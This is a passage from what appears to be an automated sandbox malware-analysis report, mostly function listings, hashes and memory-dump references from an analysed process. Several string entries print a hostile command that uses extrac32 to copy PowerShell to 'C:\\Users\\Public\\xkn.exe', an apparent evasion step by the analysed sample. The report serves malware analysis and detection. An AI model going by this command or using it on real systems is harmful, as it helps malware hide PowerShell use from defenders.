                                                                                                                    • longjmp.MSVCRT(?,?,00000000,00007FF789BD1F69,?,?,?,?,?,?,?,00007FF789BC286E,00000000,00000000,00000000,00000000), ref: 00007FF789BDD435
                                                                                                                    • longjmp.MSVCRT(?,?,00000000,00007FF789BD1F69,?,?,?,?,?,?,?,00007FF789BC286E,00000000,00000000,00000000,00000000), ref: 00007FF789BDD480
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CriticalSection$EnterFileLeave$LockPointerShared_get_osfhandlelongjmp$AcquireByteCharErrorLastMultiReadReleaseWidewcschr
                                                                                                                    • String ID: =,;$extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe
                                                                                                                    • API String ID: 3964947564-3923461198
                                                                                                                    • Opcode ID: ac10f6592d03a1150df86db3bbd316513fcc4d2075019832c3c795bce2986d35
                                                                                                                    • Instruction ID: 595b233fee0a876da68b1ad4d30df6d1d9ca3e52b33322c307394aa22108c222
                                                                                                                    • Opcode Fuzzy Hash: ac10f6592d03a1150df86db3bbd316513fcc4d2075019832c3c795bce2986d35
                                                                                                                    • Instruction Fuzzy Hash: 64026D21A0968A86EB54BF21D848178FEB5FF85FABFF44135D90E42694DF3DA405C720
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BD02A0 Relevance: 35.3, APIs: 13, Strings: 7, Instructions: 279COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcsicmp$iswspacewcschr
                                                                                                                    • String ID: ;$=,;$FOR$FOR/?$IF/?$REM$REM/?
                                                                                                                    • API String ID: 840959033-3627297882
                                                                                                                    • Opcode ID: a685c2dfbfb933869e1ee9a5fd26f57dd0ea790cc444f73fb6d6a268455a5bb9
                                                                                                                    • Instruction ID: 4211118bbea2dbb3ad5e21c13c292b0b335293eedc5265c8fa3e386c4432ebdb
                                                                                                                    • Opcode Fuzzy Hash: a685c2dfbfb933869e1ee9a5fd26f57dd0ea790cc444f73fb6d6a268455a5bb9
                                                                                                                    • Instruction Fuzzy Hash: D6D15721E0C64BC6FA54BF21E8592B8AAB0BF45F46FF45035E94E472A5EE2CE405C730
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BD081C Relevance: 35.1, APIs: 12, Strings: 8, Instructions: 130COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcsicmp$EnvironmentVariable
                                                                                                                    • String ID: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC$CMDCMDLINE$CMDEXTVERSION$DATE$ERRORLEVEL$HIGHESTNUMANODENUMBER$RANDOM$TIME
                                                                                                                    • API String ID: 198002717-267741548
                                                                                                                    • Opcode ID: 86cb16d536f244c24baf619aaa5ba530f3c61f8a6c087709382502a2cbb2fdc2
                                                                                                                    • Instruction ID: 3ee1d55f7debd053ad87d0b4589c8f6b52253fca84852f0eef335fd204e9e62b
                                                                                                                    • Opcode Fuzzy Hash: 86cb16d536f244c24baf619aaa5ba530f3c61f8a6c087709382502a2cbb2fdc2
                                                                                                                    • Instruction Fuzzy Hash: 2C512A21A0864B86F650AF16A818279FEB1FF49F92FE4A035D90F13695EF2DE104C760
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BCEF40 Relevance: 33.7, APIs: 16, Strings: 3, Instructions: 465COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: iswdigitiswspacewcschr
                                                                                                                    • String ID: ()|&=,;"$=,;$Ungetting: '%s'
                                                                                                                    • API String ID: 1595556998-2755026540
                                                                                                                    • Opcode ID: 78b794f6fc69934632e6eee377604cec53d1945fb932c7168ee33591e32c1865
                                                                                                                    • Instruction ID: 8b94d3e687d0a376922d933758e47e6858e6a8e231de90d1612eee7d9714d2fa
                                                                                                                    • Opcode Fuzzy Hash: 78b794f6fc69934632e6eee377604cec53d1945fb932c7168ee33591e32c1865
                                                                                                                    • Instruction Fuzzy Hash: 9F227C65E0C65A86FA607F26E544279EAB0BF00FABFF08176D98D466D4DF3CA441C630
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BCD3F0 Relevance: 31.8, APIs: 16, Strings: 2, Instructions: 310memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Heap$Processwcschr$Alloc$Sizeiswspace
                                                                                                                    • String ID: "$=,;
                                                                                                                    • API String ID: 3545743878-4143597401
                                                                                                                    • Opcode ID: 41b55f4c43934df12ec69819f95cbaf5faa5e7209c82e771a15df21cb83dbe60
                                                                                                                    • Instruction ID: 164507219820a78b379c7a11d74c1a748083d1d0c2170e8290eba14a5b2e846c
                                                                                                                    • Opcode Fuzzy Hash: 41b55f4c43934df12ec69819f95cbaf5faa5e7209c82e771a15df21cb83dbe60
                                                                                                                    • Instruction Fuzzy Hash: 42C19569A0969A82EB756F11D400379FEF0FF84F9AFA59035DA4D02B94EF3CA445C220
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BE5BF4 Relevance: 26.4, APIs: 2, Strings: 13, Instructions: 153windowthreadCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CurrentFormatMessageThread
                                                                                                                    • String ID: $%hs!%p: $%hs(%d) tid(%x) %08X %ws$%hs(%u)\%hs!%p: $(caller: %p) $CallContext:[%hs] $Exception$FailFast$LogHr$Msg:[%ws] $ReturnHr$[%hs(%hs)]$[%hs]
                                                                                                                    • API String ID: 2411632146-3173542853
                                                                                                                    • Opcode ID: fb2fb1c3bf230b004cc3ce09a0c69924bb125e2a6cca917ccdca682aa570422a
                                                                                                                    • Instruction ID: 35fbd4614c76641ff088e2972d19b741d55f3a99318d2f693ab980a3c53d23f7
                                                                                                                    • Opcode Fuzzy Hash: fb2fb1c3bf230b004cc3ce09a0c69924bb125e2a6cca917ccdca682aa570422a
                                                                                                                    • Instruction Fuzzy Hash: 5C616BB1A1964AC1EA24EF51A4145B9ABB8FF44F86FE4413AEE4D03758EF7CE540C720
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BD26E0 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 187fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateFile_open_osfhandle
                                                                                                                    • String ID: con
                                                                                                                    • API String ID: 2905481843-4257191772
                                                                                                                    • Opcode ID: bb4e9a8148a0ebbab0b20462a10cedd0498cb3513ed2e56bee41ab165d728bb2
                                                                                                                    • Instruction ID: 112f27413d1f9d5081d6a331526e7c0725ed7c5c05c77d69bd2ba058dd18133c
                                                                                                                    • Opcode Fuzzy Hash: bb4e9a8148a0ebbab0b20462a10cedd0498cb3513ed2e56bee41ab165d728bb2
                                                                                                                    • Instruction Fuzzy Hash: 4871A532A086858AE760AF55E444279FEB0FB89FA2FA44234DA5E427D4DF3DD449CB10
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BE93E8 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 168COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ConsoleMode$Handle$wcsrchr$CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailureiswspacewcschr
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3829876242-3916222277
                                                                                                                    • Opcode ID: a065431fe6af81354ef476bd10952e9750a3a50c047aab405a5f97467c5f577a
                                                                                                                    • Instruction ID: 152e21fea1e5532e6ae3f02ee8050f2dfb2c8cbc38178a657ad274a5ba6b2eb4
                                                                                                                    • Opcode Fuzzy Hash: a065431fe6af81354ef476bd10952e9750a3a50c047aab405a5f97467c5f577a
                                                                                                                    • Instruction Fuzzy Hash: 99617E22A0864687EA14AF51941417EBAB4FFC9F96FA58135DE0E07795EF3CE409CB10
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BF1A40 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 148COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcsicmpmemset$Volume$DriveInformationNamePathType
                                                                                                                    • String ID: CSVFS$NTFS$REFS
                                                                                                                    • API String ID: 3510147486-2605508654
                                                                                                                    • Opcode ID: 16da7e415156957614f2e65e2147701ecc6f9267ccedce46241fe4d5de2b202f
                                                                                                                    • Instruction ID: ff350af1ce8a9bb48c6a083615066fc6edcec415700679fdb3c8c517ade62cac
                                                                                                                    • Opcode Fuzzy Hash: 16da7e415156957614f2e65e2147701ecc6f9267ccedce46241fe4d5de2b202f
                                                                                                                    • Instruction Fuzzy Hash: 78617F32708BC68AEB659F21D8543E9BBB4FB45B8AF945035DA0D4B758EF38D104C710
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BC72B0 Relevance: 21.3, APIs: 1, Strings: 11, Instructions: 283COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • longjmp.MSVCRT(?,00000000,00000000,00007FF789BC7279,?,?,?,?,?,00007FF789BCBFA9), ref: 00007FF789BE4485
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: longjmp
                                                                                                                    • String ID: == $EQU $FOR$FOR /?$GEQ $GTR $IF /?$LEQ $LSS $NEQ $REM /?
                                                                                                                    • API String ID: 1832741078-366822981
                                                                                                                    • Opcode ID: 33da1405c176275929384e71d7b709e1d480dac8859b2aca32cf24daa89c1558
                                                                                                                    • Instruction ID: 16fd5e9b91d4a141e45b85494afb12685d7b82db018508fa49dd583c206364c9
                                                                                                                    • Opcode Fuzzy Hash: 33da1405c176275929384e71d7b709e1d480dac8859b2aca32cf24daa89c1558
                                                                                                                    • Instruction Fuzzy Hash: CBC17E60E0C64A85E624BF5691846BCAFB6BF46FAAFF00036DD0D57691CF2CA546C360
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BCB998 Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 275COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Heapwcschr$AllocateProcessmemset
                                                                                                                    • String ID: -$:.\$=,;$=,;+/[] "
                                                                                                                    • API String ID: 2060774286-969133440
                                                                                                                    • Opcode ID: 7b3217b0480b3f12f234bd17b6b4b81bb5ac0aea220cc5327607834eba670ac4
                                                                                                                    • Instruction ID: 8be3dadc8041a8a5c7e2adb5761a162a52edd1f40069be2372ff4ccdf2cf1f05
                                                                                                                    • Opcode Fuzzy Hash: 7b3217b0480b3f12f234bd17b6b4b81bb5ac0aea220cc5327607834eba670ac4
                                                                                                                    • Instruction Fuzzy Hash: 0EB1A621A0D69A81EA60AF15944427DBBB0FF84FAAFE50235DA5E437D4DF3CE945C320
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BD2B94 Relevance: 19.6, APIs: 6, Strings: 7, Instructions: 110COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe $EQU$GEQ$GTR$LEQ$LSS$NEQ
                                                                                                                    • API String ID: 0-2096332766
                                                                                                                    • Opcode ID: 27546f26981fd3a6242742626cf9575fc19742bdde1af1eb23768a0abe577f48
                                                                                                                    • Instruction ID: 363fb0081b49b9f1980f6573bc77d4820ffede08c3469366566fd40bfd2db124
                                                                                                                    • Opcode Fuzzy Hash: 27546f26981fd3a6242742626cf9575fc19742bdde1af1eb23768a0abe577f48
                                                                                                                    • Instruction Fuzzy Hash: 86515C20A0C68B86FB14BF60A4182B9BEB1BF45F87FE45035D60E462A5EF7CA405C760
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BCFC30 Relevance: 19.6, APIs: 9, Strings: 2, Instructions: 311memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: longjmp$Heap$AllocByteCharMultiProcessWidememmovememset
                                                                                                                    • String ID: 0123456789$extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe
                                                                                                                    • API String ID: 1606811317-763823931
                                                                                                                    • Opcode ID: 8103515748828c6243a0f650469ddac0473b2fcaea6880b388f8c0650ade34ac
                                                                                                                    • Instruction ID: ae6b4d6c9635c539141b04c38e6522dae8860c5a99c0aa9aad87bee40e946da6
                                                                                                                    • Opcode Fuzzy Hash: 8103515748828c6243a0f650469ddac0473b2fcaea6880b388f8c0650ade34ac
                                                                                                                    • Instruction Fuzzy Hash: 44D18221A09A8A82EA50AF25E804179EBB0FF85FA6FE44131DA5D077E5DF3CE545C720
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BF03AC Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 219COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
